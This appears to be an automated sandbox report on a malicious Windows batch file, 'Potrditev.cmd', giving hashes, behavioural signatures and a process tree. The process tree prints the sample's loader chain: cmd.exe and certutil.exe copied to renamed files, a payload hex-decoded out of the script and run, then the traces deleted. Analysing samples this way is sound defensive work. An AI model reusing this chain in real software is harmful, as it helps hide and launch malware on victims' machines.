Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
18/07/2024, 10:32
Static task
static1
Behavioral task
behavioral1
Sample
Potrditev.cmd
Resource
win7-20240705-en
windows7-x64
12 signatures
150 seconds
Behavioral task
behavioral2
Sample
Potrditev.cmd
Resource
win10v2004-20240709-en
windows10-2004-x64
19 signatures
150 seconds
General
-
Target
Potrditev.cmd
-
Size
2.8MB
-
MD5
306e6e3743666b8f5fedb0127b041883
-
SHA1
53ac1756ee69296be5f5c99ee18b1d1cb70369d4
-
SHA256
20a156c7ad57c2c78a63e7f8d318d2bbba7e0d94186f92ef469aed643e1bf5cc
-
SHA512
233d9861fe624b707fe4b89435cf27f1216006e97b97374fa159574d63ca6db351fc2cba454554c82d210ca6f8a4f8be383c6723eab0a54ac1a2e984317804c1
-
SSDEEP
24576:RrZhKnjYBTiXW66DrApJCe4tnUNLgVaQzNqWDNRp6KNng1pyyIzmAZrQf3m29Yqk:Rr0jYNi8DrApkpUNLgVDzNVpeIh/c2B
Score
7/10
Malware Config
Signatures
-
Executes dropped EXE 8 IoCs
pid Process 2412 alpha.exe 2060 alpha.exe 1272 kn.exe 2084 alpha.exe 2936 kn.exe 2696 CLEAN.COM 2328 alpha.exe 2712 alpha.exe -
Loads dropped DLL 11 IoCs
pid Process 2516 cmd.exe 2516 cmd.exe 2060 alpha.exe 2516 cmd.exe 2084 alpha.exe 2516 cmd.exe 2516 cmd.exe 2476 WerFault.exe 2476 WerFault.exe 2476 WerFault.exe 2476 WerFault.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 2476 2696 WerFault.exe 38 -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1456 vlc.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2696 CLEAN.COM -
Suspicious behavior: EnumeratesProcesses 62 IoCs
pid Process 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1112 taskmgr.exe 1456 vlc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2608 taskmgr.exe Token: SeDebugPrivilege 1112 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 2608 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe 1112 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1456 vlc.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 2516 wrote to memory of 1276 2516 cmd.exe 31 PID 2516 wrote to memory of 1276 2516 cmd.exe 31 PID 2516 wrote to memory of 1276 2516 cmd.exe 31 PID 2516 wrote to memory of 2412 2516 cmd.exe 32 PID 2516 wrote to memory of 2412 2516 cmd.exe 32 PID 2516 wrote to memory of 2412 2516 cmd.exe 32 PID 2412 wrote to memory of 2420 2412 alpha.exe 33 PID 2412 wrote to memory of 2420 2412 alpha.exe 33 PID 2412 wrote to memory of 2420 2412 alpha.exe 33 PID 2516 wrote to memory of 2060 2516 cmd.exe 34 PID 2516 wrote to memory of 2060 2516 cmd.exe 34 PID 2516 wrote to memory of 2060 2516 cmd.exe 34 PID 2060 wrote to memory of 1272 2060 alpha.exe 35 PID 2060 wrote to memory of 1272 2060 alpha.exe 35 PID 2060 wrote to memory of 1272 2060 alpha.exe 35 PID 2516 wrote to memory of 2084 2516 cmd.exe 36 PID 2516 wrote to memory of 2084 2516 cmd.exe 36 PID 2516 wrote to memory of 2084 2516 cmd.exe 36 PID 2084 wrote to memory of 2936 2084 alpha.exe 37 PID 2084 wrote to memory of 2936 2084 alpha.exe 37 PID 2084 wrote to memory of 2936 2084 alpha.exe 37 PID 2516 wrote to memory of 2696 2516 cmd.exe 38 PID 2516 wrote to memory of 2696 2516 cmd.exe 38 PID 2516 wrote to memory of 2696 2516 cmd.exe 38 PID 2516 wrote to memory of 2696 2516 cmd.exe 38 PID 2516 wrote to memory of 2328 2516 cmd.exe 39 PID 2516 wrote to memory of 2328 2516 cmd.exe 39 PID 2516 wrote to memory of 2328 2516 cmd.exe 39 PID 2516 wrote to memory of 2712 2516 cmd.exe 40 PID 2516 wrote to memory of 2712 2516 cmd.exe 40 PID 2516 wrote to memory of 2712 2516 cmd.exe 40 PID 2696 wrote to memory of 2476 2696 CLEAN.COM 43 PID 2696 wrote to memory of 2476 2696 CLEAN.COM 43 PID 2696 wrote to memory of 2476 2696 CLEAN.COM 43 PID 2696 wrote to memory of 2476 2696 CLEAN.COM 43
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:1276
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2420
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 93⤵
- Executes dropped EXE
PID:1272
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 122⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 123⤵
- Executes dropped EXE
PID:2936
-
-
-
C:\Users\Public\Libraries\CLEAN.COMC:\Users\Public\Libraries\CLEAN.COM2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 7163⤵
- Loads dropped DLL
- Program crash
PID:2476
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2328
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2712
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2608
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1112
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\InvokeComplete.mpeg"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1456
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD5523ccf257ca222401cd3915ac086f986
SHA1d9dcb0b165fbf6b5e085d7a70009f3924a7968e4
SHA256e52726ecfc11680f894efff7398e244424efffd0b8fb222a7a4c1afa7c7a20f8
SHA5121fa4acc83444c7eacfc6295bb5b24be779f986ae726a76da2cd8f0c27dfaee6c639684efa45e4515f91bdbb027025d40275a0f425344bf9fc21558807b8f544f
-
Filesize
957KB
MD5aa4820620a6d753208dbd180c8ddc87a
SHA1d687b79b4eb4359d7c310681e978c1be1ff46109
SHA256ae5740d23ffac06e5bda5dd0acfa6023df3c7951ca0c97bd3dc4b1dd22a34525
SHA5121994729cd2458ca85ca4add2ace7e1f636c941b0aef4dd1d2ecbe80324463705697387b1aaf4d7413011fef3d87415bcf0d0e3e2088e18e18c5925e06688f8a6
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
